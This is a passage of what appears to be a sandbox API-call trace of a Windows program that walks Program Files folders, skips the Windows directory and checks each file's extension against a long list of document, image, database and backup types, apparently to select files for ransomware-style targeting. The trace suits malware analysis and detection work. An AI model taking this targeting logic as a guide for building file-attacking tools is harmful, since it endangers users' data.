ftLastWriteTime.dwLowDateTime=0x5c8c3a00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x3e70, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSADDNDR.OLB", cAlternateFileName="")) returned 0 [0285.961] FindClose (in: hFindFile=0x39483a8 | out: hFindFile=0x39483a8) returned 1 [0285.962] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0285.962] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa04663f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="microsoft shared", cAlternateFileName="MICROS~1")) returned 1 [0285.962] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4025f98 [0285.962] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\*", lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa04663f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x3947d28 [0285.962] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa04663f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0285.962] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf6c42af, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x81028f76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x81028f76, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ClickToRun", cAlternateFileName="CLICKT~1")) returned 1 [0285.962] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun") returned 57 [0285.962] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun") returned 1 [0285.962] lstrlenW (lpString="ClickToRun") returned 10 [0285.962] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="ClickToRun") returned -1 [0285.962] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4036fe8 [0285.963] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun") returned 57 [0285.963] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\*", lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf6c42af, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x81028f76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x81028f76, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947ea8 [0286.148] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbf6c42af, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x81028f76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x81028f76, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.153] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x809e6bf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x809e6bf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-file-l1-2-0.dll", cAlternateFileName="API-MS~1.DLL")) returned 1 [0286.169] lstrlenW (lpString="api-ms-win-core-file-l1-2-0.dll") returned 31 [0286.169] lstrlenW (lpString=".1cd") returned 4 [0286.169] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0286.169] lstrlenW (lpString=".3ds") returned 4 [0286.170] lstrcmpiW (lpString1=".3ds", lpString2=".dll") returned -1 [0286.170] lstrlenW (lpString=".3fr") returned 4 [0286.170] lstrcmpiW (lpString1=".3fr", lpString2=".dll") returned -1 [0286.170] lstrlenW (lpString=".3g2") returned 4 [0286.170] lstrcmpiW (lpString1=".3g2", lpString2=".dll") returned -1 [0286.170] lstrlenW (lpString=".3gp") returned 4 [0286.170] lstrcmpiW (lpString1=".3gp", lpString2=".dll") returned -1 [0286.171] lstrlenW (lpString=".7z") returned 3 [0286.171] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0286.171] lstrlenW (lpString=".accda") returned 6 [0286.171] lstrcmpiW (lpString1=".accda", lpString2="-0.dll") returned -1 [0286.171] lstrlenW (lpString=".accdb") returned 6 [0286.171] lstrcmpiW (lpString1=".accdb", lpString2="-0.dll") returned -1 [0286.171] lstrlenW (lpString=".accdc") returned 6 [0286.171] lstrcmpiW (lpString1=".accdc", lpString2="-0.dll") returned -1 [0286.171] lstrlenW (lpString=".accde") returned 6 [0286.171] lstrcmpiW (lpString1=".accde", lpString2="-0.dll") returned -1 [0286.171] lstrlenW (lpString=".accdt") returned 6 [0286.171] lstrcmpiW (lpString1=".accdt", lpString2="-0.dll") returned -1 [0286.171] lstrlenW (lpString=".accdw") returned 6 [0286.171] lstrcmpiW (lpString1=".accdw", lpString2="-0.dll") returned -1 [0286.171] lstrlenW (lpString=".adb") returned 4 [0286.171] lstrcmpiW (lpString1=".adb", lpString2=".dll") returned -1 [0286.171] lstrlenW (lpString=".adp") returned 4 [0286.171] lstrcmpiW (lpString1=".adp", lpString2=".dll") returned -1 [0286.171] lstrlenW (lpString=".ai") returned 3 [0286.171] lstrcmpiW (lpString1=".ai", lpString2="dll") returned -1 [0286.171] lstrlenW (lpString=".ai3") returned 4 [0286.171] lstrcmpiW (lpString1=".ai3", lpString2=".dll") returned -1 [0286.171] lstrlenW (lpString=".ai4") returned 4 [0286.171] lstrcmpiW (lpString1=".ai4", lpString2=".dll") returned -1 [0286.171] lstrlenW (lpString=".ai5") returned 4 [0286.171] lstrcmpiW (lpString1=".ai5", lpString2=".dll") returned -1 [0286.171] lstrlenW (lpString=".ai6") returned 4 [0286.171] lstrcmpiW (lpString1=".ai6", lpString2=".dll") returned -1 [0286.172] lstrlenW (lpString=".ai7") returned 4 [0286.172] lstrcmpiW (lpString1=".ai7", lpString2=".dll") returned -1 [0286.172] lstrlenW (lpString=".ai8") returned 4 [0286.172] lstrcmpiW (lpString1=".ai8", lpString2=".dll") returned -1 [0286.172] lstrlenW (lpString=".anim") returned 5 [0286.172] lstrcmpiW (lpString1=".anim", lpString2="0.dll") returned -1 [0286.172] lstrlenW (lpString=".arw") returned 4 [0286.172] lstrcmpiW (lpString1=".arw", lpString2=".dll") returned -1 [0286.172] lstrlenW (lpString=".as") returned 3 [0286.172] lstrcmpiW (lpString1=".as", lpString2="dll") returned -1 [0286.172] lstrlenW (lpString=".asa") returned 4 [0286.172] lstrcmpiW (lpString1=".asa", lpString2=".dll") returned -1 [0286.172] lstrlenW (lpString=".asc") returned 4 [0286.172] lstrcmpiW (lpString1=".asc", lpString2=".dll") returned -1 [0286.172] lstrlenW (lpString=".ascx") returned 5 [0286.172] lstrcmpiW (lpString1=".ascx", lpString2="0.dll") returned -1 [0286.172] lstrlenW (lpString=".asm") returned 4 [0286.172] lstrcmpiW (lpString1=".asm", lpString2=".dll") returned -1 [0286.172] lstrlenW (lpString=".asmx") returned 5 [0286.172] lstrcmpiW (lpString1=".asmx", lpString2="0.dll") returned -1 [0286.172] lstrlenW (lpString=".asp") returned 4 [0286.172] lstrcmpiW (lpString1=".asp", lpString2=".dll") returned -1 [0286.172] lstrlenW (lpString=".aspx") returned 5 [0286.172] lstrcmpiW (lpString1=".aspx", lpString2="0.dll") returned -1 [0286.172] lstrlenW (lpString=".asr") returned 4 [0286.172] lstrcmpiW (lpString1=".asr", lpString2=".dll") returned -1 [0286.172] lstrlenW (lpString=".asx") returned 4 [0286.172] lstrcmpiW (lpString1=".asx", lpString2=".dll") returned -1 [0286.172] lstrlenW (lpString=".avi") returned 4 [0286.172] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0286.172] lstrlenW (lpString=".avs") returned 4 [0286.172] lstrcmpiW (lpString1=".avs", lpString2=".dll") returned -1 [0286.172] lstrlenW (lpString=".backup") returned 7 [0286.172] lstrcmpiW (lpString1=".backup", lpString2="2-0.dll") returned -1 [0286.172] lstrlenW (lpString=".bak") returned 4 [0286.173] lstrcmpiW (lpString1=".bak", lpString2=".dll") returned -1 [0286.173] lstrlenW (lpString=".bay") returned 4 [0286.173] lstrcmpiW (lpString1=".bay", lpString2=".dll") returned -1 [0286.173] lstrlenW (lpString=".bd") returned 3 [0286.173] lstrcmpiW (lpString1=".bd", lpString2="dll") returned -1 [0286.173] lstrlenW (lpString=".bin") returned 4 [0286.173] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0286.173] lstrlenW (lpString=".bmp") returned 4 [0286.173] lstrcmpiW (lpString1=".bmp", lpString2=".dll") returned -1 [0286.173] lstrlenW (lpString=".bz2") returned 4 [0286.173] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0286.173] lstrlenW (lpString=".c") returned 2 [0286.173] lstrcmpiW (lpString1=".c", lpString2="ll") returned -1 [0286.173] lstrlenW (lpString=".cdr") returned 4 [0286.173] lstrcmpiW (lpString1=".cdr", lpString2=".dll") returned -1 [0286.173] lstrlenW (lpString=".cer") returned 4 [0286.173] lstrcmpiW (lpString1=".cer", lpString2=".dll") returned -1 [0286.173] lstrlenW (lpString=".cf") returned 3 [0286.173] lstrcmpiW (lpString1=".cf", lpString2="dll") returned -1 [0286.173] lstrlenW (lpString=".cfc") returned 4 [0286.173] lstrcmpiW (lpString1=".cfc", lpString2=".dll") returned -1 [0286.173] lstrlenW (lpString=".cfm") returned 4 [0286.173] lstrcmpiW (lpString1=".cfm", lpString2=".dll") returned -1 [0286.173] lstrlenW (lpString=".cfml") returned 5 [0286.173] lstrcmpiW (lpString1=".cfml", lpString2="0.dll") returned -1 [0286.173] lstrlenW (lpString=".cfu") returned 4 [0286.173] lstrcmpiW (lpString1=".cfu", lpString2=".dll") returned -1 [0286.173] lstrlenW (lpString=".chm") returned 4 [0286.173] lstrcmpiW (lpString1=".chm", lpString2=".dll") returned -1 [0286.173] lstrlenW (lpString=".cin") returned 4 [0286.173] lstrcmpiW (lpString1=".cin", lpString2=".dll") returned -1 [0286.173] lstrlenW (lpString=".class") returned 6 [0286.173] lstrcmpiW (lpString1=".class", lpString2="-0.dll") returned -1 [0286.173] lstrlenW (lpString=".clx") returned 4 [0286.174] lstrcmpiW (lpString1=".clx", lpString2=".dll") returned -1 [0286.174] lstrlenW (lpString=".config") returned 7 [0286.174] lstrcmpiW (lpString1=".config", lpString2="2-0.dll") returned -1 [0286.174] lstrlenW (lpString=".cpp") returned 4 [0286.174] lstrcmpiW (lpString1=".cpp", lpString2=".dll") returned -1 [0286.174] lstrlenW (lpString=".cr2") returned 4 [0286.174] lstrcmpiW (lpString1=".cr2", lpString2=".dll") returned -1 [0286.174] lstrlenW (lpString=".crt") returned 4 [0286.174] lstrcmpiW (lpString1=".crt", lpString2=".dll") returned -1 [0286.174] lstrlenW (lpString=".crw") returned 4 [0286.174] lstrcmpiW (lpString1=".crw", lpString2=".dll") returned -1 [0286.174] lstrlenW (lpString=".cs") returned 3 [0286.174] lstrcmpiW (lpString1=".cs", lpString2="dll") returned -1 [0286.174] lstrlenW (lpString=".css") returned 4 [0286.174] lstrcmpiW (lpString1=".css", lpString2=".dll") returned -1 [0286.174] lstrlenW (lpString=".csv") returned 4 [0286.174] lstrcmpiW (lpString1=".csv", lpString2=".dll") returned -1 [0286.174] lstrlenW (lpString=".cub") returned 4 [0286.174] lstrcmpiW (lpString1=".cub", lpString2=".dll") returned -1 [0286.174] lstrlenW (lpString=".dae") returned 4 [0286.174] lstrcmpiW (lpString1=".dae", lpString2=".dll") returned -1 [0286.174] lstrlenW (lpString=".dat") returned 4 [0286.174] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0286.174] lstrlenW (lpString=".db") returned 3 [0286.174] lstrcmpiW (lpString1=".db", lpString2="dll") returned -1 [0286.174] lstrlenW (lpString=".dbf") returned 4 [0286.174] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0286.174] lstrlenW (lpString=".dbx") returned 4 [0286.174] lstrcmpiW (lpString1=".dbx", lpString2=".dll") returned -1 [0286.174] lstrlenW (lpString=".dc3") returned 4 [0286.174] lstrcmpiW (lpString1=".dc3", lpString2=".dll") returned -1 [0286.174] lstrlenW (lpString=".dcm") returned 4 [0286.175] lstrcmpiW (lpString1=".dcm", lpString2=".dll") returned -1 [0286.175] lstrlenW (lpString=".dcr") returned 4 [0286.175] lstrcmpiW (lpString1=".dcr", lpString2=".dll") returned -1 [0286.175] lstrlenW (lpString=".der") returned 4 [0286.175] lstrcmpiW (lpString1=".der", lpString2=".dll") returned -1 [0286.175] lstrlenW (lpString=".dib") returned 4 [0286.175] lstrcmpiW (lpString1=".dib", lpString2=".dll") returned -1 [0286.175] lstrlenW (lpString=".dic") returned 4 [0286.175] lstrcmpiW (lpString1=".dic", lpString2=".dll") returned -1 [0286.175] lstrlenW (lpString=".dif") returned 4 [0286.175] lstrcmpiW (lpString1=".dif", lpString2=".dll") returned -1 [0286.175] lstrlenW (lpString=".divx") returned 5 [0286.175] lstrcmpiW (lpString1=".divx", lpString2="0.dll") returned -1 [0286.175] lstrlenW (lpString=".djvu") returned 5 [0286.175] lstrcmpiW (lpString1=".djvu", lpString2="0.dll") returned -1 [0286.175] lstrlenW (lpString=".dng") returned 4 [0286.175] lstrcmpiW (lpString1=".dng", lpString2=".dll") returned 1 [0286.175] lstrlenW (lpString=".doc") returned 4 [0286.175] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0286.175] lstrlenW (lpString=".docm") returned 5 [0286.175] lstrcmpiW (lpString1=".docm", lpString2="0.dll") returned -1 [0286.175] lstrlenW (lpString=".docx") returned 5 [0286.175] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0286.175] lstrlenW (lpString=".dot") returned 4 [0286.175] lstrcmpiW (lpString1=".dot", lpString2=".dll") returned 1 [0286.175] lstrlenW (lpString=".dotm") returned 5 [0286.175] lstrcmpiW (lpString1=".dotm", lpString2="0.dll") returned -1 [0286.175] lstrlenW (lpString=".dotx") returned 5 [0286.175] lstrcmpiW (lpString1=".dotx", lpString2="0.dll") returned -1 [0286.175] lstrlenW (lpString=".dpx") returned 4 [0286.175] lstrcmpiW (lpString1=".dpx", lpString2=".dll") returned 1 [0286.175] lstrlenW (lpString=".dqy") returned 4 [0286.176] lstrcmpiW (lpString1=".dqy", lpString2=".dll") returned 1 [0286.176] lstrlenW (lpString=".dsn") returned 4 [0286.176] lstrcmpiW (lpString1=".dsn", lpString2=".dll") returned 1 [0286.176] lstrlenW (lpString=".dt") returned 3 [0286.176] lstrcmpiW (lpString1=".dt", lpString2="dll") returned -1 [0286.176] lstrlenW (lpString=".dtd") returned 4 [0286.176] lstrcmpiW (lpString1=".dtd", lpString2=".dll") returned 1 [0286.176] lstrlenW (lpString=".dwg") returned 4 [0286.176] lstrcmpiW (lpString1=".dwg", lpString2=".dll") returned 1 [0286.176] lstrlenW (lpString=".dwt") returned 4 [0286.176] lstrcmpiW (lpString1=".dwt", lpString2=".dll") returned 1 [0286.176] lstrlenW (lpString=".dx") returned 3 [0286.176] lstrcmpiW (lpString1=".dx", lpString2="dll") returned -1 [0286.176] lstrlenW (lpString=".dxf") returned 4 [0286.176] lstrcmpiW (lpString1=".dxf", lpString2=".dll") returned 1 [0286.176] lstrlenW (lpString=".edml") returned 5 [0286.176] lstrcmpiW (lpString1=".edml", lpString2="0.dll") returned -1 [0286.176] lstrlenW (lpString=".efd") returned 4 [0286.176] lstrcmpiW (lpString1=".efd", lpString2=".dll") returned 1 [0286.176] lstrlenW (lpString=".elf") returned 4 [0286.176] lstrcmpiW (lpString1=".elf", lpString2=".dll") returned 1 [0286.176] lstrlenW (lpString=".emf") returned 4 [0286.176] lstrcmpiW (lpString1=".emf", lpString2=".dll") returned 1 [0286.176] lstrlenW (lpString=".emz") returned 4 [0286.176] lstrcmpiW (lpString1=".emz", lpString2=".dll") returned 1 [0286.176] lstrlenW (lpString=".epf") returned 4 [0286.176] lstrcmpiW (lpString1=".epf", lpString2=".dll") returned 1 [0286.176] lstrlenW (lpString=".eps") returned 4 [0286.177] lstrcmpiW (lpString1=".eps", lpString2=".dll") returned 1 [0286.177] lstrlenW (lpString=".epsf") returned 5 [0286.177] lstrcmpiW (lpString1=".epsf", lpString2="0.dll") returned -1 [0286.177] lstrlenW (lpString=".epsp") returned 5 [0286.177] lstrcmpiW (lpString1=".epsp", lpString2="0.dll") returned -1 [0286.177] lstrlenW (lpString=".erf") returned 4 [0286.177] lstrcmpiW (lpString1=".erf", lpString2=".dll") returned 1 [0286.177] lstrlenW (lpString=".exr") returned 4 [0286.177] lstrcmpiW (lpString1=".exr", lpString2=".dll") returned 1 [0286.177] lstrlenW (lpString=".f4v") returned 4 [0286.177] lstrcmpiW (lpString1=".f4v", lpString2=".dll") returned 1 [0286.177] lstrlenW (lpString=".fido") returned 5 [0286.177] lstrcmpiW (lpString1=".fido", lpString2="0.dll") returned -1 [0286.177] lstrlenW (lpString=".flm") returned 4 [0286.177] lstrcmpiW (lpString1=".flm", lpString2=".dll") returned 1 [0286.177] lstrlenW (lpString=".flv") returned 4 [0286.177] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0286.177] lstrlenW (lpString=".frm") returned 4 [0286.177] lstrcmpiW (lpString1=".frm", lpString2=".dll") returned 1 [0286.177] lstrlenW (lpString=".fxg") returned 4 [0286.177] lstrcmpiW (lpString1=".fxg", lpString2=".dll") returned 1 [0286.177] lstrlenW (lpString=".geo") returned 4 [0286.177] lstrcmpiW (lpString1=".geo", lpString2=".dll") returned 1 [0286.177] lstrlenW (lpString=".gif") returned 4 [0286.177] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0286.177] lstrlenW (lpString=".grs") returned 4 [0286.177] lstrcmpiW (lpString1=".grs", lpString2=".dll") returned 1 [0286.177] lstrlenW (lpString=".gz") returned 3 [0286.177] lstrcmpiW (lpString1=".gz", lpString2="dll") returned -1 [0286.177] lstrlenW (lpString=".h") returned 2 [0286.177] lstrcmpiW (lpString1=".h", lpString2="ll") returned -1 [0286.177] lstrlenW (lpString=".hdr") returned 4 [0286.177] lstrcmpiW (lpString1=".hdr", lpString2=".dll") returned 1 [0286.178] lstrlenW (lpString=".hpp") returned 4 [0286.178] lstrcmpiW (lpString1=".hpp", lpString2=".dll") returned 1 [0286.178] lstrlenW (lpString=".hta") returned 4 [0286.178] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0286.178] lstrlenW (lpString=".htc") returned 4 [0286.178] lstrcmpiW (lpString1=".htc", lpString2=".dll") returned 1 [0286.178] lstrlenW (lpString=".htm") returned 4 [0286.178] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0286.178] lstrlenW (lpString=".html") returned 5 [0286.178] lstrcmpiW (lpString1=".html", lpString2="0.dll") returned -1 [0286.178] lstrlenW (lpString=".icb") returned 4 [0286.178] lstrcmpiW (lpString1=".icb", lpString2=".dll") returned 1 [0286.178] lstrlenW (lpString=".ics") returned 4 [0286.178] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0286.178] lstrlenW (lpString=".iff") returned 4 [0286.178] lstrcmpiW (lpString1=".iff", lpString2=".dll") returned 1 [0286.178] lstrlenW (lpString=".inc") returned 4 [0286.178] lstrcmpiW (lpString1=".inc", lpString2=".dll") returned 1 [0286.178] lstrlenW (lpString=".indd") returned 5 [0286.178] lstrcmpiW (lpString1=".indd", lpString2="0.dll") returned -1 [0286.178] lstrlenW (lpString=".ini") returned 4 [0286.178] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0286.178] lstrlenW (lpString=".iqy") returned 4 [0286.178] lstrcmpiW (lpString1=".iqy", lpString2=".dll") returned 1 [0286.178] lstrlenW (lpString=".j2c") returned 4 [0286.178] lstrcmpiW (lpString1=".j2c", lpString2=".dll") returned 1 [0286.178] lstrlenW (lpString=".j2k") returned 4 [0286.178] lstrcmpiW (lpString1=".j2k", lpString2=".dll") returned 1 [0286.178] lstrlenW (lpString=".java") returned 5 [0286.178] lstrcmpiW (lpString1=".java", lpString2="0.dll") returned -1 [0286.178] lstrlenW (lpString=".jp2") returned 4 [0286.178] lstrcmpiW (lpString1=".jp2", lpString2=".dll") returned 1 [0286.179] lstrlenW (lpString=".jpc") returned 4 [0286.179] lstrcmpiW (lpString1=".jpc", lpString2=".dll") returned 1 [0286.179] lstrlenW (lpString=".jpe") returned 4 [0286.179] lstrcmpiW (lpString1=".jpe", lpString2=".dll") returned 1 [0286.179] lstrlenW (lpString=".jpeg") returned 5 [0286.179] lstrcmpiW (lpString1=".jpeg", lpString2="0.dll") returned -1 [0286.179] lstrlenW (lpString=".jpf") returned 4 [0286.179] lstrcmpiW (lpString1=".jpf", lpString2=".dll") returned 1 [0286.179] lstrlenW (lpString=".jpg") returned 4 [0286.179] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0286.179] lstrlenW (lpString=".jpx") returned 4 [0286.179] lstrcmpiW (lpString1=".jpx", lpString2=".dll") returned 1 [0286.179] lstrlenW (lpString=".js") returned 3 [0286.179] lstrcmpiW (lpString1=".js", lpString2="dll") returned -1 [0286.179] lstrlenW (lpString=".jsf") returned 4 [0286.179] lstrcmpiW (lpString1=".jsf", lpString2=".dll") returned 1 [0286.179] lstrlenW (lpString=".json") returned 5 [0286.179] lstrcmpiW (lpString1=".json", lpString2="0.dll") returned -1 [0286.179] lstrlenW (lpString=".jsp") returned 4 [0286.179] lstrcmpiW (lpString1=".jsp", lpString2=".dll") returned 1 [0286.179] lstrlenW (lpString=".kdc") returned 4 [0286.179] lstrcmpiW (lpString1=".kdc", lpString2=".dll") returned 1 [0286.179] lstrlenW (lpString=".kmz") returned 4 [0286.179] lstrcmpiW (lpString1=".kmz", lpString2=".dll") returned 1 [0286.179] lstrlenW (lpString=".kwm") returned 4 [0286.179] lstrcmpiW (lpString1=".kwm", lpString2=".dll") returned 1 [0286.179] lstrlenW (lpString=".lasso") returned 6 [0286.179] lstrcmpiW (lpString1=".lasso", lpString2="-0.dll") returned -1 [0286.179] lstrlenW (lpString=".lbi") returned 4 [0286.179] lstrcmpiW (lpString1=".lbi", lpString2=".dll") returned 1 [0286.179] lstrlenW (lpString=".lgf") returned 4 [0286.179] lstrcmpiW (lpString1=".lgf", lpString2=".dll") returned 1 [0286.179] lstrlenW (lpString=".lgp") returned 4 [0286.179] lstrcmpiW (lpString1=".lgp", lpString2=".dll") returned 1 [0286.180] lstrlenW (lpString=".log") returned 4 [0286.180] lstrcmpiW (lpString1=".log", lpString2=".dll") returned 1 [0286.180] lstrlenW (lpString=".m1v") returned 4 [0286.180] lstrcmpiW (lpString1=".m1v", lpString2=".dll") returned 1 [0286.180] lstrlenW (lpString=".m4a") returned 4 [0286.180] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0286.180] lstrlenW (lpString=".m4v") returned 4 [0286.180] lstrcmpiW (lpString1=".m4v", lpString2=".dll") returned 1 [0286.180] lstrlenW (lpString=".max") returned 4 [0286.180] lstrcmpiW (lpString1=".max", lpString2=".dll") returned 1 [0286.180] lstrlenW (lpString=".md") returned 3 [0286.180] lstrcmpiW (lpString1=".md", lpString2="dll") returned -1 [0286.180] lstrlenW (lpString=".mda") returned 4 [0286.180] lstrcmpiW (lpString1=".mda", lpString2=".dll") returned 1 [0286.180] lstrlenW (lpString=".mdb") returned 4 [0286.180] lstrcmpiW (lpString1=".mdb", lpString2=".dll") returned 1 [0286.180] lstrlenW (lpString=".mde") returned 4 [0286.180] lstrcmpiW (lpString1=".mde", lpString2=".dll") returned 1 [0286.180] lstrlenW (lpString=".mdf") returned 4 [0286.180] lstrcmpiW (lpString1=".mdf", lpString2=".dll") returned 1 [0286.180] lstrlenW (lpString=".mdw") returned 4 [0286.180] lstrcmpiW (lpString1=".mdw", lpString2=".dll") returned 1 [0286.180] lstrlenW (lpString=".mef") returned 4 [0286.180] lstrcmpiW (lpString1=".mef", lpString2=".dll") returned 1 [0286.180] lstrlenW (lpString=".mft") returned 4 [0286.180] lstrcmpiW (lpString1=".mft", lpString2=".dll") returned 1 [0286.180] lstrlenW (lpString=".mfw") returned 4 [0286.180] lstrcmpiW (lpString1=".mfw", lpString2=".dll") returned 1 [0286.180] lstrlenW (lpString=".mht") returned 4 [0286.180] lstrcmpiW (lpString1=".mht", lpString2=".dll") returned 1 [0286.180] lstrlenW (lpString=".mhtml") returned 6 [0286.180] lstrcmpiW (lpString1=".mhtml", lpString2="-0.dll") returned -1 [0286.180] lstrlenW (lpString=".mka") returned 4 [0286.180] lstrcmpiW (lpString1=".mka", lpString2=".dll") returned 1 [0286.180] lstrlenW (lpString=".mkidx") returned 6 [0286.181] lstrcmpiW (lpString1=".mkidx", lpString2="-0.dll") returned -1 [0286.181] lstrlenW (lpString=".mkv") returned 4 [0286.181] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0286.181] lstrlenW (lpString=".mos") returned 4 [0286.181] lstrcmpiW (lpString1=".mos", lpString2=".dll") returned 1 [0286.181] lstrlenW (lpString=".mov") returned 4 [0286.181] lstrcmpiW (lpString1=".mov", lpString2=".dll") returned 1 [0286.181] lstrlenW (lpString=".mp3") returned 4 [0286.181] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0286.181] lstrlenW (lpString=".mp4") returned 4 [0286.181] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0286.181] lstrlenW (lpString=".mpeg") returned 5 [0286.181] lstrcmpiW (lpString1=".mpeg", lpString2="0.dll") returned -1 [0286.181] lstrlenW (lpString=".mpg") returned 4 [0286.181] lstrcmpiW (lpString1=".mpg", lpString2=".dll") returned 1 [0286.181] lstrlenW (lpString=".mpv") returned 4 [0286.181] lstrcmpiW (lpString1=".mpv", lpString2=".dll") returned 1 [0286.181] lstrlenW (lpString=".mrw") returned 4 [0286.181] lstrcmpiW (lpString1=".mrw", lpString2=".dll") returned 1 [0286.181] lstrlenW (lpString=".msg") returned 4 [0286.181] lstrcmpiW (lpString1=".msg", lpString2=".dll") returned 1 [0286.181] lstrlenW (lpString=".mxl") returned 4 [0286.181] lstrcmpiW (lpString1=".mxl", lpString2=".dll") returned 1 [0286.181] lstrlenW (lpString=".myd") returned 4 [0286.181] lstrcmpiW (lpString1=".myd", lpString2=".dll") returned 1 [0286.181] lstrlenW (lpString=".myi") returned 4 [0286.181] lstrcmpiW (lpString1=".myi", lpString2=".dll") returned 1 [0286.181] lstrlenW (lpString=".nef") returned 4 [0286.181] lstrcmpiW (lpString1=".nef", lpString2=".dll") returned 1 [0286.181] lstrlenW (lpString=".nrw") returned 4 [0286.181] lstrcmpiW (lpString1=".nrw", lpString2=".dll") returned 1 [0286.181] lstrlenW (lpString=".obj") returned 4 [0286.181] lstrcmpiW (lpString1=".obj", lpString2=".dll") returned 1 [0286.181] lstrlenW (lpString=".odb") returned 4 [0286.181] lstrcmpiW (lpString1=".odb", lpString2=".dll") returned 1 [0286.181] lstrlenW (lpString=".odc") returned 4 [0286.182] lstrcmpiW (lpString1=".odc", lpString2=".dll") returned 1 [0286.182] lstrlenW (lpString=".odm") 